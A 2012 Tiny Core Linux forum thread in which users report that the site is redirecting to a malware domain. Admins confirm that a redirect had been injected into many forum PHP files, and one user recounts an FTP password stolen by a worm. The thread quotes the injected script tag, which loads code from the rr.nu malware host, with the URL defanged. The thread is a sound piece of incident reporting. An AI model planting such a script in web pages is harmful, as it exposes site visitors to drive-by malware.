Tiny Core Linux

Off-Topic => Off-Topic - Tiny Core Lounge => Topic started by: u54749 on March 04, 2012, 12:07:46 PM

Title: Tinycore site possibly compromized?
Post by: u54749 on March 04, 2012, 12:07:46 PM
I got a couple of random redirects from the Tinycore site to hXXp://rmore79riveru.rr.nu today.

see also
http://blog.sucuri.net/2012/02/malware-campaign-from-rr-nu.html (http://blog.sucuri.net/2012/02/malware-campaign-from-rr-nu.html)
http://www.haruhisuzumiya.net/haruhiforum//viewtopic.php?t=2108 (http://www.haruhisuzumiya.net/haruhiforum//viewtopic.php?t=2108)

as extra proof:
Download attachment "udev.log" from http://forum.tinycorelinux.net/index.php/topic,11396.msg60347.html#msg60347 (http://forum.tinycorelinux.net/index.php/topic,11396.msg60347.html#msg60347)

it has a very suspect last line that absolutely does not belong in a log file.  I suppose this line was not present in the originally uploaded file.
the line is:
"<script src="hXXp://rmore79riveru.rr.nu/nl.php?p=d"></script>"

Can somebody reconstruct/confirm this?
Title: Re: Tinycore site possibly compromized?
Post by: gutmensch on March 05, 2012, 07:33:58 AM
Many thanks for the pointer, this rr.nu redirection was indeed in many of the forum php files, which should be clean now... attachments seem to be clean as well, at least I didn't find any reference to rr.nu in them any more, so it must have been delivered while accessing and downloading them.
Title: Re: Tinycore site possibly compromized?
Post by: bmarkus on March 05, 2012, 07:58:44 AM
Many thanks for the pointer, this rr.nu redirection was indeed in many of the forum php files, which should be clean now... attachments seem to be clean as well, at least I didn't find any reference to rr.nu in them any more, so it must have been delivered while accessing and downloading them.

Do you know how these files got infected?
Title: Re: Tinycore site possibly compromized?
Post by: gutmensch on March 05, 2012, 08:05:51 AM
Do you know how these files got infected?
Nope. But it seems to have hit also wordpress and other php based installations... so I would guess it's got something to do with an admin account and maybe a hacked browser/OS, which triggers some "nice" update functions within SMF itself to spread the malware.
Title: Re: Tinycore site possibly compromized?
Post by: bmarkus on March 05, 2012, 08:42:56 AM
Do you know how these files got infected?
Nope. But it seems to have hit also wordpress and other php based installations... so I would guess it's got something to do with an admin account and maybe a hacked browser/OS, which triggers some "nice" update functions within SMF itself to spread the malware.

I had frequent infection a year ago with my SMF and other sites. In fact everything was infected and according to modification time simply in ABC order. Code attached to HTML was working (I mean as virus creator wanted), PHP got only demaged. It was easy to clean with a simply Python program but it was reinfected soon.

In my case ftp admin password was stolen and simly it logged in from outside with ftp. I can't prove, but most likely a worm have stolen my admin password from Total Commander. Since I changed admin password and do not store it in FTP clients, my sites are clean and never got infected.